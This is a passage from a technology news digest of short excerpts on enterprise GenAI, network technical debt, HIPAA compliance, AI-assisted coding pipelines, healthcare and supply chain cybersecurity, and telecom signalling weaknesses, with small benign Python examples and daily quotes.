At some point institutions will bite the bullet and let GenAI interact with customers or with their live data. Smith believes it will be important to alert customers when they are offered a product or process in which generative artificial intelligence plays a role. Both staff and the public must be clear on this and have confidence in what the bank discloses. Some consumer paranoia exists about GenAI, but Smith says Accenture research indicates that many customers will accept its use with their data — if they feel that they are receiving some benefit in return. Asked for an example, Smith points to a frequent beef about bank customer service — having to explain a situation all over again when trying to work out a problem or address a need and being transferred from one staffer to another. “I shouldn’t have to educate you on what happened two days ago,” says Smith. “I want to walk in and find that you already know.” GenAI can help with this type of situation. One last pointer from Smith concerns the customer experience of using processes controlled by GenAI. She says that some customer-facing GenAI provides inferior look and feel, which can become a friction point.


Technical Debt and the Hidden Cost of Network Management: Why it’s Time to Revisit Your Network Foundations

An often-overlooked example of this growing debt is a failure to actively manage and optimize IP addresses and Domain Name System (DNS) configurations—the very pillars of corporate network communication. Internet service providers (ISPs) of dedicated Internet access (DIA) to businesses would often assign blocks of addresses to customers. If those customers ever cancel or change providers, there's often a clean-up process to recover those resources. Businesses going through reorganizations or mergers and acquisitions may lose track (or may never have had good records) of IP address ranges. Security policies and routing policies may then become outdated, leaving IP address hijackers a window through perimeter security measures. Companies using Network Address Translation (NAT) or Carrier-Grade NAT (CGNAT) to share one IP address among many devices may find that those functions, which edit data packets in flight, create unexpected failure modes. Sometimes, they hide problems, such as when malware or address snooping is happening within the boundary of the NAT.
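The clean-up the passage describes starts with an authoritative inventory of the blocks the company actually owns, against which firewall and routing entries can be audited. A minimal sketch using Python's standard `ipaddress` module (the address blocks are placeholders from the documentation ranges):

```python
import ipaddress

# Hypothetical inventory of address blocks the company still legitimately
# holds; keeping this record current is the point of the clean-up process.
registered_blocks = [
    ipaddress.ip_network("198.51.100.0/24"),
    ipaddress.ip_network("203.0.113.0/25"),
]

def is_registered(addr: str) -> bool:
    """True if the address falls inside a block the company owns."""
    ip = ipaddress.ip_address(addr)
    return any(ip in block for block in registered_blocks)

# An address left over from a cancelled ISP assignment fails the check,
# flagging the stale firewall or routing entry that references it.
```

Running every allowlisted address in security policy through such a check is one cheap way to surface the outdated entries that give hijackers their window.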


Bank Four Zeros Crucial for Banking Resilience, says Huawei

“Banking Everywhere means that, from a technology point of view, we have to make sure that any transactions should 100% not result in any problems or risks. It’s not easy. For example, on the Tube in London, how do you deliver 5G to enable transactions? Banking Everywhere is easy to say, but hard to do.” Cao highlights the high availability and easy migration of GaussDB. He says after GaussDB was deployed in one of the biggest banks in China, the recovery time objective (RTO) was slashed to 120 seconds – a world-leading level. He says Huawei is working on reducing this to just 30 seconds. ... “Some banks say we are in the AI era, some say the intelligent era, some say the open banking era, but a lot of banks still struggle working with a traditional model. So today it is like a multi-generational industry,” he says. “On the one hand, exciting things are coming, like Gen AI, and we have to be prepared. We have to be realistic to see what challenges we face today. If a bank is not resilient enough, it’s very hard to embrace Gen AI, or any intelligent opportunities.”


The Three Pillars of HIPAA Compliance

Policies and procedures must be developed on all aspects of HIPAA but not just to allow boxes to be ticked in a HIPAA compliance checklist. That may be sufficient to pass a very basic document review, but policies alone will not make an organization HIPAA compliant. All members of the workforce must be provided with the policies and must receive training relevant to their role. Every individual in a healthcare organization has a role to play in making their organization HIPAA compliant and must be trained to allow them to perform their duties in a HIPAA-compliant way. Employees should not have to guess how HIPAA applies. In addition to training, employees must be made aware of the sanctions policy and the repercussions of HIPAA violations and the sanctions policy must be enforced. HIPAA calls for training to be provided during the onboarding process, regardless of whether a new hire is a seasoned healthcare professional or is new to the industry. It is the responsibility of the compliance officer to ensure that appropriate training programs are developed and that all members of the workforce receive adequate training. 


And herein lies the problem, says Ma: When business stakeholders seek to understand EA’s value proposition, or even check the status of a project, they may get different answers depending on whom they ask. It’s the three-blind-men-describing-an-elephant problem: The man who feels the tail describes an animal very different from the one described by the man feeling the abdomen, or by the one feeling the ears and tusks. Though the variety in their descriptions may reflect the function’s comprehensiveness, to the uneducated executive, it sounds like misalignment. ... First, the full-stack architect could ensure the function’s other architects are indeed aligned, not only among themselves, but with stakeholders from both the business and engineering. That last bit shouldn’t be overlooked, Ma says. While much attention gets paid to the notion that architects should be able to work fluently with the business, they should, in fact, work just as fluently with Engineering, meaning that whoever steps into the role should wield deep technical expertise, an attribute vital to earning the respect of engineers, and one that more traditional enterprise architects lack.


What is cloud native and how can it generate business value?

Cloud-native workloads are conceived with the cloud in mind, focusing on scalability, agility, and application independence. Building applications directly in the cloud is a core component of agile development and DevOps practices, allowing developers to quickly update their stack to meet business needs. A definitive example of cloud-native workloads would be microservices, in which different elements of an application run in parallel as independent services, communicating via application programming interfaces (APIs). ... “Companies who deliver cloud services have demonstrated that they can … free us up from having to manage infrastructure hands-on,” Purcell tells ITPro. In the “old days,” Purcell explains, a prospective provider of cloud-native services would have had to rent property, procure hardware, and have a core IT team capable of establishing a framework to deliver the application. “By running it in the cloud … you just don't have to do any of that,” Purcell says. Because the main public cloud providers continue “building for builders,” as Purcell puts it, cloud native continues to be a dominant concept. Of course, applications in the private cloud can be cloud native as well.


Why It’s Time to Rethink Generative AI in the Enterprise

One of the biggest changes is the increasing availability of foundation models beyond those supplied by companies that specialize in generative AI services. In addition to open-source models that have been released by companies like Meta and Google, we’re now seeing vendors like SAP developing their own foundation models. Crucially, these models will provide greater opportunity for enterprises to custom-model operations by injecting their own parameters to control the context in which the model operates. In some cases, they can also train or retrain models on custom data. ... Integrating AI models with all the data that exists in a business is a complex task, not least because it is often unclear which dataset is most relevant for a specific use case. For instance, when querying sales data, should the model be prompted using data from the ERP system, the CRM, a manually prepared spreadsheet, or something else? To tackle this issue, businesses are likely to adopt what I refer to as “data dispatchers.” A data dispatcher is an integration tool that exposes data to GenAI services efficiently, making it easy for enterprises to leverage their data for custom model training.
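The routing decision at the heart of the "data dispatcher" idea can be sketched very simply: score each registered dataset against the incoming query and hand the model the best match. A toy version, assuming a keyword-overlap score (dataset names and keyword lists are hypothetical; a real dispatcher would use embeddings and metadata):

```python
# Hypothetical registry mapping each dataset to terms it covers.
DATASETS = {
    "erp_sales": {"invoice", "order", "revenue", "shipment"},
    "crm_accounts": {"customer", "lead", "pipeline", "contact"},
    "hr_records": {"employee", "payroll", "headcount"},
}

def dispatch(query: str) -> str:
    """Route a natural-language query to the dataset whose keywords
    overlap it the most, before any prompt reaches the model."""
    words = set(query.lower().split())
    return max(DATASETS, key=lambda name: len(DATASETS[name] & words))

source = dispatch("show revenue by order for last quarter")  # -> "erp_sales"
```

The point of the design is that the model never has to guess which system of record to consult; that decision is made by cheap, auditable plumbing in front of it.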



Quote for the day:

"Great achievement is usually born of great sacrifice, and is never the result of selfishness." -- Napoleon Hill

Daily Tech Digest - April 04, 2024

Transforming CI/CD Pipelines for AI-Assisted Coding: Strategies and Best Practices

Most source code management tools, including Git, support tagging features that let developers apply labels to specific snippets of code. Teams that adopt AI-assisted coding should use these labels to identify code that was generated wholly or partially by AI. This is an important part of a CI/CD strategy because AI-generated code is, on the whole, less reliable than code written by a skilled human developer. For that reason, it may sometimes be necessary to run extra tests on AI-generated code — or even remove it from a codebase in the event that it triggers unexpected bugs. ... Along similar lines, some teams may find it valuable to deploy extra tests for AI-generated code during the testing phase of their CI/CD pipelines, both to ensure software quality and to catch any vulnerable code or dependencies that AI introduces into a codebase. Running those tests is likely to result in a more complex testing process because there will be two sets of tests to manage: those that apply only to AI-generated code, and those that apply to all code. Thus, the testing stage of CI/CD is likely to become more complicated for teams that use AI tools.
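The labeling step above can feed the testing step directly: if AI-generated files carry a marker, the pipeline can collect them and route them through the stricter suite. A minimal sketch, assuming a hypothetical `# ai-generated` comment convention in each file's header:

```python
from pathlib import Path

AI_MARKER = "# ai-generated"  # hypothetical tagging convention

def files_needing_extra_tests(root: str) -> list[str]:
    """Collect Python source files whose first lines carry the AI marker,
    so the CI pipeline can run the extra test set against them."""
    flagged = []
    for path in Path(root).rglob("*.py"):
        first_lines = path.read_text().splitlines()[:5]
        if any(AI_MARKER in line for line in first_lines):
            flagged.append(str(path))
    return sorted(flagged)
```

A CI job could call this to decide which files get the second, AI-specific test pass; teams using Git-native labels or trailers instead of in-file comments would swap out only the detection step.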


Revolutionising Regulatory Compliance: AI & ML Powering The Future Of Financial Governance

The use of technology is quickly transforming how businesses handle compliance challenges. AI helps by automating tasks like monitoring and reporting. It quickly finds new regulatory requirements in a sea of information and ensures adherence by the organisation. Machine learning, a type of AI, excels at spotting patterns and anomalies, which is important for regulatory adherence. By looking at historical data, it can predict possible risks, so companies can deal with them early. Compliance officers can use AI tools to do routine tasks, handle hard problems, and be more open with regulators. AI’s smart systems make compliance work smoother and more accurate. Looking forward, AI’s contribution to compliance seems promising. Predictive compliance management, powered by AI, will move from reacting to problems to spotting risks early, which could save companies from legal trouble. Real-time monitoring and personalised solutions for each company will become common, making compliance easier and better. Also, AI will work with other new technologies like blockchain and IoT to improve compliance.
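The anomaly-spotting described above can be as simple as flagging values that sit far outside historical norms. A toy sketch using a z-score threshold over transaction amounts (the data and the three-sigma threshold are illustrative; production systems use far richer models):

```python
import statistics

def flag_anomalies(history: list[float], new_values: list[float],
                   threshold: float = 3.0) -> list[float]:
    """Return new values more than `threshold` standard deviations from
    the historical mean -- a minimal stand-in for the pattern-spotting
    that ML-based compliance monitoring performs at scale."""
    mean = statistics.mean(history)
    stdev = statistics.pstdev(history)
    if stdev == 0:
        return []
    return [v for v in new_values if abs(v - mean) / stdev > threshold]

# A transaction far outside the usual range is surfaced for review;
# ordinary fluctuations pass through silently.
flagged = flag_anomalies([100, 102, 98, 101, 99], [101, 150])
```

Real compliance monitoring layers many such signals (counterparty, timing, jurisdiction) rather than a single statistic, but the reactive-to-predictive shift the article describes starts with exactly this kind of baseline-and-deviation logic.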


Codium announces Codiumate, a new AI agent that seeks to be Devin for enterprise software development

Codium hopes that Codiumate will aid developers in their workflow, speeding up all the manual typing they would otherwise have to do, doing the “heavy lifting” and mechanical coding work, while enabling the developer to act more as a hands-on product manager overseeing the process and course correcting it as necessary, almost as though it is a junior developer or new hire to the team. The technology powering the Codiumate agent on the backend is “best of breed” OpenAI models, according to Friedman. The company is also experimenting with Anthropic’s Claude and Google’s Gemini. It also offers its own large language model (LLM) designed with its AlphaCodium process that increases the performance of other LLMs in code completion tasks. While the former is available to all users, the latter Codium LLM is only for paying enterprise users. Friedman said it is superior to OpenAI’s models on coding and that a “Fortune 10” company that could not be named due to confidentiality reasons was already using it in production.


Healthcare’s cyber resilience under siege as attacks multiply

Every healthcare organization must ensure employees are well aware of and trained about potential threats. It’s critical to ensure they understand how to navigate and evaluate everything that comes in. One requirement could be to only open emails from known senders or to only open attachments if they are secure. Many organizations’ security teams will conduct resilience tests and distribute suspicious-looking emails to see which employees will click it. Modern spam filters are relatively adept at weeding out risky emails, but anyone with an inbox knows that many get through to end users. Most employers issue computers and devices, allowing for secured settings maintained by IT departments. It’s important to keep access and logins only to those devices and not on any personal devices, which are typically much easier attack points to enter a system. Maintaining robust security settings on issued machines is especially important if the employee will be working from remote locations, including at home, where network security tends to not be as robust as within enterprises.
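The "only open emails from known senders" requirement mentioned above can be enforced mechanically at the mail gateway. A toy sketch of a sender-domain allowlist check (the domains are placeholders; real deployments also verify SPF/DKIM rather than trusting the visible address):

```python
# Hypothetical allowlist of domains the organization recognizes.
KNOWN_DOMAINS = {"hospital.example", "vendor.example"}

def is_known_sender(address: str) -> bool:
    """True if the sender's domain is on the allowlist. Addresses with
    no '@' fail closed, since no domain can be verified."""
    if "@" not in address:
        return False
    domain = address.rsplit("@", 1)[-1].lower()
    return domain in KNOWN_DOMAINS
```

On its own this is a blunt instrument, which is why the article pairs such rules with spam filtering and resilience testing; spoofed headers defeat a naive string check, so the domain comparison is only useful downstream of authentication checks.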


Instilling the Hacker Mindset Organizationwide

Visibility is a foundational principle that suggests you can't secure what you don't know about. Lack of a security team's visibility is a gold rush for hackers because they typically infiltrate an organization's network via hidden or sneaky entry points. If you don't have visibility, there will undoubtedly be a way in. Without visibility into all traffic within an organization's infrastructure, threat actors can continue to lurk in the network and grant themselves access to the organization's most sensitive data. With 93% of malware hiding behind encrypted traffic but only 30% of security professionals claiming to have visibility, it's no wonder that there were more ransomware attacks in the first half of 2023 than in all of 2022. Once a cybercriminal has made their way into the network, time is limited. Only with visibility can the cybercriminal be stopped from wreaking havoc and gaining access to company data. When cybersecurity professionals can better understand the mysterious nature of hackers and how they work, they can better protect their own systems and valuable customer data. It's critical to stay vigilant not only when it comes to major security issues, but also with minor lags in security best practice.


Separating the signals from the noise in tech evolution

With technology trends extensively covered across all forms of media, IT leaders often get questions or advice from well-meaning senior colleagues on what trends to adopt. However, not every trend warrants immediate attention or even playing catch-up if you’re late to the party. Wise leaders often opt to be “smart laggards” who focus on adopting and scaling the trends that really matter to their organizations. And they focus on demonstrating value quickly or stopping pilots or initiatives that are not delivering. ... In the current environment of uncertainty, marked by persistent macroeconomic challenges, global fragmentation, and growing cybersecurity challenges, tech leaders shared their perspectives on risks and resilience. More than one described reinventing the technology function and its value proposition in times of crisis, taking a “through-cycle mindset”: pushing forward in times of crisis rather than retrenching, and focusing on long-term value creation to help the company emerge stronger when conditions change. We also discussed how dashboards should balance short- to mid-term KPIs with long-term value delivery.


Navigating risks in AI governance – what have we learned so far?

In the face of a regulatory void, several entities have taken it upon themselves to establish their own standards aimed at tackling the core issues of model transparency, explainability, and fairness. Despite these efforts, the call for a more structured approach to govern AI development, mindful of the burgeoning regulatory landscape, remains loud and clear. ... However, an AI Risk and Security (AIRS) group survey reveals a notable gap between the need for governance and its actual implementation. Only 30% of enterprises have delineated roles or responsibilities for AI systems, and a scant 20% boast a centrally managed department dedicated to AI governance. This discrepancy underscores the burgeoning necessity for comprehensive governance tools to assure a future of trustworthy AI. ... The patchwork of regulatory approaches across the globe reflects the diverse challenges and opportunities presented by AI-driven decisions. The United States, for example, saw a significant development in July 2023 when the Biden administration announced that major tech firms would self-regulate their AI development, underscoring a collaborative approach to governance.


Unlocking Personal and Professional Growth: Insights From Incident Management

The skills and lessons gained from Incident Management are highly transferable to various aspects of life. For instance, adaptability is crucial not only in responding to technical issues but also in adapting to changes in personal circumstances or professional environments. Teamwork teaches collaboration, conflict resolution, and empathy, which are essential in building strong relationships both at work and in personal life. Problem-solving skills honed during incident response can be applied to tackle challenges in any domain, from planning a project to resolving conflicts. Resilience, the ability to bounce back from setbacks, is a valuable trait that helps individuals navigate through adversity with determination and a positive mindset. Continuous improvement is a mindset that encourages individuals to seek feedback, reflect on experiences, identify areas for growth, and strive for excellence. This attitude of continuous learning and development not only benefits individuals in their careers but also contributes to personal fulfillment and satisfaction.


How to build a developer-first company

Providing a great developer experience—by enabling our customers to easily add auth flows and user management to their apps—leads to a great end-user experience as the customer’s customers seamlessly and securely log in. This kind of virtuous cycle exists at many developer-focused companies. When building a successful developer-first business, it’s critical to tie together the similarities between the customer experience and the developer experience while clearly delineating the differences. ... When helping developers build their customer experience, we emphasize building onboarding and authentication flows with the best user experience in mind. That includes reducing friction, like the use of passwordless methods and progressive profiling, and creating an embedded in-app native experience to avoid needless redirections or pop-ups. Our developer experience includes an onboarding wizard that sets up their project and login flows in a few clicks. We offer a drag-and-drop visual workflow editor to easily create and customize their customer journey. We also provide robust documentation, code snippets, SDKs, tutorials, and a Slack community for troubleshooting.


How to fix the growing cybersecurity skills gap

Organizations looking to upskill their cybersecurity professionals should consider adjusting and reorganizing key workflows to give the entire security team — aside from just the CISO — ample time to research emerging threats and remain up to date on what the ramifications of these threats may be. By automating repetitive tasks for these team members or restructuring key processes and timelines, the entire team, from CISO to analyst, can have more time to dedicate towards staying ahead of industry trends and cyber-attacks, ultimately strengthening the organization’s ability to detect and respond to threats in the long run. Giving employees time and space to be curious and explore the latest threat intelligence, commentary and insight — including topic-based tabletop exercises or red teaming — will yield significant dividends in understanding the organization's true security posture and preparedness. In today’s cybersecurity landscape, companies must strive to be a learning-forward organization. Tangible adoption of this principle must go beyond formal skills and training — every encounter your teams have with a threat or an attack is a learning opportunity.



Quote for the day:

"Though no one can go back and make a brand new start, anyone can start from now and make a brand new ending." -- Carl Bard

Daily Tech Digest - April 03, 2024

What is identity fabric immunity? Abstracting identity for better security

An identity fabric becomes an attractive option when it is merited, but the adoption of it before it is really called for adds unnecessary complexity. The key is knowing the tipping point. If it is doing the job with minimal friction, a simple identity provider framework is sufficient. When the infrastructural complexity begins to cause serious difficulty within the organization, the security abstraction layer described by IFI offers a way forward, says Dmitry Sotnikov, chief product officer at Cayosoft. “Applications are now highly distributed, and users, partners, and customers log into systems from wherever they are, leaving security teams without an easily defined network and physical boundary to protect.” Signs that identity solutions are inadequate include difficulty in managing user access, account provisioning, and response to security incidents both real and simulated. Managers may find that it is very hard to gain an overhead perspective on the security disposition of an enterprise and taking actions that affect security as a whole is cumbersome or extremely challenging.


Cyber attacks on critical infrastructure show advanced tactics and new capabilities

The interconnectedness of critical infrastructure assets, devices, and systems with third parties throughout the software supply chain has made identifying attack paths more complex than ever before. This interconnectedness creates numerous potential entry points for attackers to exploit. Additionally, cyber adversaries now possess a range of new tactics. ... Recent attacks on entities like Colonial Pipeline and water treatment plants demonstrate the potential for malicious actors to cause real-world impacts with just a few clicks. Ransomware criminals are increasingly targeting industries that rely heavily on operational systems, knowing that downtime can result in significant financial losses. Ransomware-as-a-Service (RaaS) has further fueled the proliferation of ransomware attacks, making these attacks more accessible to a wider range of threat actors. It’s important to note that criminal ransomware operators don’t typically use the zero-days that make headlines, or cyberwarfare-level capabilities; they exploit known vulnerabilities that have been unpatched for years.


Feds Ask Telcos: How Are You Combating Location Tracking?

The problems stem from the trust-based approach underpinning SS7, which is used to secure 3G and earlier networks, and Diameter, which is used to secure 4G. As detailed in a white paper from Swedish telecommunications giant Ericsson, both protocols take a trust-based approach, assuming that any network elements communicating with each other should be doing so. Even though Diameter is a newer protocol, it lacks security capabilities. "Diameter does not encrypt originating IP addresses during transport, which increases the risk of network spoofing, where an attacker poses as a legitimate roaming partner on a network to gain access to the network," the FCC said. Since SS7 and Diameter still serve as "the foundation for mobile telephone networks, especially for roaming capabilities to be able to interconnect networks," as networks expand their coverage and new networks and more users appear, "the opportunity for a bad actor to exploit SS7 and Diameter has increased," the FCC said. While the use of protocols such as SS7 and Diameter can be restricted to secure tunnels, thus making them more secure, the use of secure tunneling isn't mandatory, Ericsson said.


Avoiding the dangers of AI-generated code

As the adoption of AI tools to create code increases, organizations will have to put in place the proper checks and balances to ensure the code they write is clean—maintainable, reliable, high-quality, and secure. Leaders will need to make clean code a priority if they want to succeed. Clean code—code that is consistent, intentional, adaptable, and responsible—ensures top-quality software throughout its life cycle. With so many developers working on code concurrently, it’s imperative that software written by one developer can be easily understood and modified by another at any point in time. With clean code, developers can be more productive without spending as much time figuring out context or correcting code from another team member. When it comes to mass production of code assisted by AI, maintaining clean code is essential to minimizing risks and technical debt. Implementing a “clean as you code” approach with proper testing and analysis is crucial to ensuring code quality, whether the code is human-generated or AI-generated. Speaking of humans, I don’t believe developers will go away, but the manner in which they do their work every day will certainly change. 


Biggest problems and best practices for generative AI rollouts

The first step in the genAI journey is to determine the AI ambition for the organization and conduct an exploratory dialogue on what is possible, according to Gartner. The next step is to solicit potential use cases that can be piloted with genAI technologies. Unless genAI benefits translate into immediate headcount or other cost reductions, organizations can expect financial benefits to accrue more slowly over time, depending on how the generated value is used. For example, Chandrasekaran said, benefits that grow over time include being able to do more with less as demand increases, relying on fewer senior workers, reducing the use of service providers, and improving customer and employee value, which leads to higher retention. Most enterprises are also customizing pre-built LLMs rather than building their own models. Through prompt engineering and retrieval-augmented generation (RAG), firms can adapt an open-source model to their specific needs without full retraining. RAG grounds the model's responses in an organization's own data, yielding more customized and accurate output and greatly reducing anomalies such as hallucinations.
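The retrieval step that makes RAG work can be sketched in miniature. In this sketch a toy bag-of-words similarity stands in for a real embedding model (an assumption made so the example runs with no external services); in production, documents would be embedded with a model and stored in a vector index.

```python
# Minimal RAG retrieval sketch: rank documents by similarity to the query,
# then stuff the top matches into the prompt so the model answers from
# the organization's own data rather than from memory.
import math
from collections import Counter

def embed(text: str) -> Counter:
    """Toy 'embedding': a bag-of-words term-frequency vector."""
    return Counter(text.lower().split())

def cosine(a: Counter, b: Counter) -> float:
    dot = sum(a[t] * b[t] for t in a)
    norm = (math.sqrt(sum(v * v for v in a.values()))
            * math.sqrt(sum(v * v for v in b.values())))
    return dot / norm if norm else 0.0

def retrieve(query: str, docs: list[str], k: int = 2) -> list[str]:
    """Return the k documents most similar to the query."""
    q = embed(query)
    return sorted(docs, key=lambda d: cosine(q, embed(d)), reverse=True)[:k]

def build_prompt(query: str, docs: list[str]) -> str:
    """Ground the model by putting retrieved context into the prompt."""
    context = "\n".join(f"- {d}" for d in retrieve(query, docs))
    return f"Answer using only this context:\n{context}\n\nQuestion: {query}"

docs = [
    "Refunds are processed within 5 business days.",
    "Support is available Monday to Friday.",
    "Shipping to Europe takes 7 to 10 days.",
]
prompt = build_prompt("How long do refunds take?", docs)
```

Because the model is instructed to answer from the retrieved context, a question about refunds is answered from the refund policy document rather than invented, which is how RAG curbs hallucinations.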


Digital Transformation: What Should be Next on Your Agenda?

Paying close attention to disruptive emerging technologies will help to future-proof strategies, Buchholz says. "Have you accounted for the impact of quantum computing?" he asks. "Within several years, it's likely to go from lab curiosity to useful tool." How about digital twins or the spatial web? "Not all of these [technologies] will come to pass but investing a few days up front can save years of pain down the road." Focus on digital transformation initiatives that have the highest potential to create value for the organization and its stakeholders, Bakalar advises. "Avoid wasting time, money, and effort on projects with low strategic value, feasibility or urgency." The best way to prioritize a digital transformation strategy is by defining precisely what transformation means to your organization, says Jed Cawthorne, modern work practice lead with IT consulting firm Creospark, via email. "Develop the strategy appropriately and, from there, prioritize the projects that will form your transformation plan." If you focus on smaller, easier-to-digest transformation projects, you can reassess your prioritization at the completion of each one, Cawthorne says.
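The prioritization Bakalar describes can be made mechanical. A hedged sketch follows: score each candidate project on strategic value, feasibility, and urgency and work the highest scores first. The 1-5 scales, the weights, and the example projects are all illustrative assumptions, not a prescribed methodology.

```python
# Illustrative project-prioritization sketch: weighted scoring on the three
# criteria named in the article (strategic value, feasibility, urgency).
def priority_score(value: int, feasibility: int, urgency: int,
                   weights=(0.5, 0.3, 0.2)) -> float:
    """Weighted score on 1-5 scales; higher means do it sooner."""
    return weights[0] * value + weights[1] * feasibility + weights[2] * urgency

# Hypothetical candidate projects scored as (value, feasibility, urgency).
projects = {
    "customer self-service portal": (5, 4, 3),
    "legacy ERP rewrite":           (4, 2, 2),
    "quantum computing pilot":      (2, 1, 1),
}
ranked = sorted(projects, key=lambda p: priority_score(*projects[p]),
                reverse=True)
```

Rescoring the remaining projects after each one completes gives exactly the reassess-as-you-go loop Cawthorne recommends.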


User privacy must come first with biometrics

Use cases have expanded to biometric boarding at airports, transaction authentication in mobile banking and e-commerce, and even surveillance by various branches of law enforcement. The benefits of AI-powered facial recognition technology are off the charts, with potential for dramatic increases in efficiency, security, and ease of use across industries. But with upside comes an equally compelling downside, as organizations need to consider the privacy risks and concerns associated with collecting and using biometric data at scale. ... As biometrics continues to go mainstream, data discovery, data classification, and the handling of sensitive information will become a mainstay of IT task lists. But the key to not overwhelming IT is to incorporate data privacy principles and tactics at the start of development, so problems can be tackled proactively rather than reactively. This will be tech's main challenge in the coming years. With AI fever everywhere, users will soon expect to access facial recognition services and products in a more personalized, efficient way, without compromising on the privacy front.


Be the change: Leveraging AI to fast track next-gen cyber defenders

With AI, enterprises can detect and prevent threats with speed and efficiency and secure a broader range of assets better than humans alone. They're no longer limited by how many people are in their Security Operations Center or the expertise of their team. Instead, they are empowered to see things in real time and defend their environment against attacks in a highly scalable way. But AI can't act alone, and automation can only go so far. Humans will always be needed in the loop to decide what to do with the data and insights AI provides. AI can be used to support these people and supercharge their capabilities. Consider threat hunting: the job of a threat hunter is to translate hypotheses about adversary behavior into queries. But this requires knowledge of complex query languages and coding skills that are in short supply. AI-based platforms allow security teams to ask complex threat- and adversary-hunting questions using natural language, and within seconds provide insights and recommended response actions that can be immediately executed. Entry-level threat hunters once limited in what they could solve can move to the next level, and veterans can become more efficient, effective, and strategic.
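The natural-language-to-query translation such platforms perform can be illustrated in a toy form. Real products use an LLM for this step; the keyword mapping below is a deliberately simple stand-in so the example is self-contained, and the field names in the output filter are invented for illustration.

```python
# Toy stand-in for the NL-to-query step of an AI hunting platform:
# map a plain-English question to a structured log filter.
def nl_to_query(question: str) -> dict:
    """Translate a hunting question into a (hypothetical) filter dict."""
    q = question.lower()
    query = {}
    if "failed login" in q:
        query["event_type"] = "authentication_failure"
    if "last 24 hours" in q:
        query["time_range"] = "now-24h"
    if "admin" in q:
        query["account_role"] = "admin"
    return query

query = nl_to_query("Show failed logins on admin accounts in the last 24 hours")
# query == {"event_type": "authentication_failure",
#           "time_range": "now-24h", "account_role": "admin"}
```

The value for an entry-level analyst is that the hunting hypothesis stays in plain English; the query language expertise lives in the translation layer.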


Why A Bad LLM Is Worse Than No LLM At All

For an LLM to return a useful output, it needs to have interpreted the user’s query or prompt the way it was intended. There is a lot of nuance in language that can lead to misunderstandings, and no solution yet exists with guardrails that ensure consistent—and accurate—results that meet expectations. ... LLMs, including ChatGPT, have been known to simply make up data to fill in the gaps in their knowledge just so that they can answer the prompt. They are designed to produce answers that feel right, even if they aren’t. If you work with vendors supplying LLMs within their products or as standalone tools, it’s critical to ask them how their LLM is trained and what they’re doing to mitigate inaccurate results. ... The majority of LLMs on the market are available publicly online, which makes it incredibly challenging to safeguard any sensitive information or queries you input. It’s very likely that this data is visible to the vendor, who will almost certainly be storing and using it to train future versions of their product. And if that vendor is hacked or there’s a data leak, expect even bigger headaches for your organization.
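One common mitigation for the exposure risk above is to redact obviously sensitive tokens locally before a prompt ever leaves your network. The sketch below covers only two patterns (email addresses and US-style SSNs) as an illustration; real deployments need proper data-discovery and classification tooling rather than a handful of regexes.

```python
# Minimal prompt-redaction sketch: strip sensitive values before any
# text is sent to a publicly hosted LLM. Patterns are illustrative only.
import re

PATTERNS = {
    "EMAIL": re.compile(r"\b[\w.+-]+@[\w-]+\.[\w.]+\b"),
    "SSN":   re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),
}

def redact(prompt: str) -> str:
    """Replace sensitive matches with placeholder tags before any API call."""
    for label, pattern in PATTERNS.items():
        prompt = pattern.sub(f"[{label}]", prompt)
    return prompt

safe = redact("Summarize the ticket from jane.doe@example.com, SSN 123-45-6789.")
# 'safe' now contains [EMAIL] and [SSN] placeholders instead of raw values.
```

Even if the vendor stores the prompt or later suffers a breach, only the placeholders leave the building.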


Building Resilient Cybersecurity Into Supply Chain Operations: A Technical Approach

One of the key challenges in supply chain cybersecurity is the interdependent nature of the supply chain: a single weak link can compromise the entire operation. For example, a cyberattack on a supplier could disrupt production, leading to delays, financial loss, and damage to the company's reputation. Moreover, the growing trend of digital transformation has led to increased use of technologies such as Internet of Things (IoT) devices, cloud computing, and artificial intelligence in supply chain operations. While these technologies offer numerous benefits, they also expand the attack surface. ... The digital transformation of supply chains has led to the integration of various technologies such as IoT devices, cloud platforms, and AI-based systems. While these technologies have enhanced efficiency and productivity, they have also increased the complexity of the cybersecurity landscape. Ensuring the security of these diverse technologies, each with its own set of vulnerabilities, is a significant technical challenge.



Quote for the day:

"The distance between insanity and genius is measured only by success." -- Bruce Feirstein